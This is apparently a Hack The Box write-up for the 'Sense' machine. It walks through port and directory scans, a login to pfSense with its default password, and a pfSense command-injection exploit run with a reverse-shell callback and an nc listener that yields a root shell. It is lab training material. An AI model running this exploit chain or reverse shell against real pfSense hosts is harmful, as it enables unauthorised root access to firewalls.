Pages

Search

HTB Sense

$ nmap -A -T4 -p- sense.htb

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-22 11:03 CEST
Stats: 0:02:55 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 93.75% done; ETC: 11:06 (0:00:03 remaining)
Nmap scan report for sense.htb (10.10.10.60)
Host is up (0.051s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://sense.htb/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 187.56 seconds

$ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.60
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/08/23 10:59:21 Starting gobuster
===============================================================
Error: error on running goubster: unable to connect to https://10.10.10.60/: invalid certificate: x509: cannot validate certificate for 10.10.10.60 because it doesn't contain any IP SANs

We need to skip SSL certificate verification using -k option.

$ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -k

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.60
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/08/23 11:00:25 Starting gobuster
===============================================================
https://10.10.10.60/themes (Status: 301)
https://10.10.10.60/css (Status: 301)
https://10.10.10.60/includes (Status: 301)
https://10.10.10.60/javascript (Status: 301)
https://10.10.10.60/classes (Status: 301)
https://10.10.10.60/widgets (Status: 301)
https://10.10.10.60/tree (Status: 301)
https://10.10.10.60/shortcuts (Status: 301)
https://10.10.10.60/installer (Status: 301)
https://10.10.10.60/wizards (Status: 301)
https://10.10.10.60/csrf (Status: 301)
===============================================================
2020/08/23 11:07:44 Finished
===============================================================

$ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -x .txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.60
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/08/23 11:37:44 Starting gobuster
===============================================================
https://10.10.10.60/themes (Status: 301)
https://10.10.10.60/css (Status: 301)
https://10.10.10.60/includes (Status: 301)
https://10.10.10.60/javascript (Status: 301)
https://10.10.10.60/changelog.txt (Status: 200)
https://10.10.10.60/classes (Status: 301)
https://10.10.10.60/widgets (Status: 301)
https://10.10.10.60/tree (Status: 301)
https://10.10.10.60/shortcuts (Status: 301)
https://10.10.10.60/installer (Status: 301)
https://10.10.10.60/wizards (Status: 301)
[ERROR] 2020/08/23 11:52:38 [!] Get https://10.10.10.60/newspage-81: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/08/23 11:53:40 [!] Get https://10.10.10.60/website_hosting.txt: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/08/23 11:55:12 [!] Get https://10.10.10.60/76452: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/08/23 11:55:14 [!] Get https://10.10.10.60/20030507.txt: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/08/23 11:56:50 [!] Get https://10.10.10.60/p29: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
https://10.10.10.60/csrf (Status: 301)
https://10.10.10.60/system-users.txt (Status: 200)
https://10.10.10.60/filebrowser (Status: 301)
[ERROR] 2020/08/23 12:14:58 [!] Get https://10.10.10.60/79138.txt: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/08/23 12:17:41 [!] Get https://10.10.10.60/dwg: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
https://10.10.10.60/%7Echeckout%7E (Status: 403)
===============================================================
2020/08/23 12:29:50 Finished
===============================================================

We’ve found 2 text documents.

changelog.txt

# Security Changelog 

### Issue
There was a failure in updating the firewall. Manual patching is therefore required

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window

system-users.txt

####Support ticket###

Please create the following user

username: Rohit
password: company defaults

Company defaults?
As we have a PfSense site, we can try with default Pfsense password (pfsense)

Access to http://10.10.10.60

This is a PfSense login site

user:rohit
password: pfsense

Version is 2.1.3-RELEASE (amd64)

PfSense < 2.1.4 is vulnerable to a Command Injection.

pfSense < 2.1.4 – ‘status_rrd_graph_img.php’ Command Injection
https://www.exploit-db.com/exploits/43560

$ python3 sense_exploit.py --rhost 10.10.10.60 --lhost 10.10.14.6 --lport 1234 --username rohit --password pfsense

CSRF token obtained
Running exploit...
Exploit completed

$ nc -lvnp 1234

listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.60] 4534
sh: can't access tty; job control turned off
#

# whoami

root

# cd /home
# ls

.snap
rohit

# cd rohit
# ls

.tcshrc
user.txt

# cat user.txt

8721XXXXXXXXXXXXXXXXXXXXXXXXXXXX

# cd /root
# cat root.txt

d08cXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *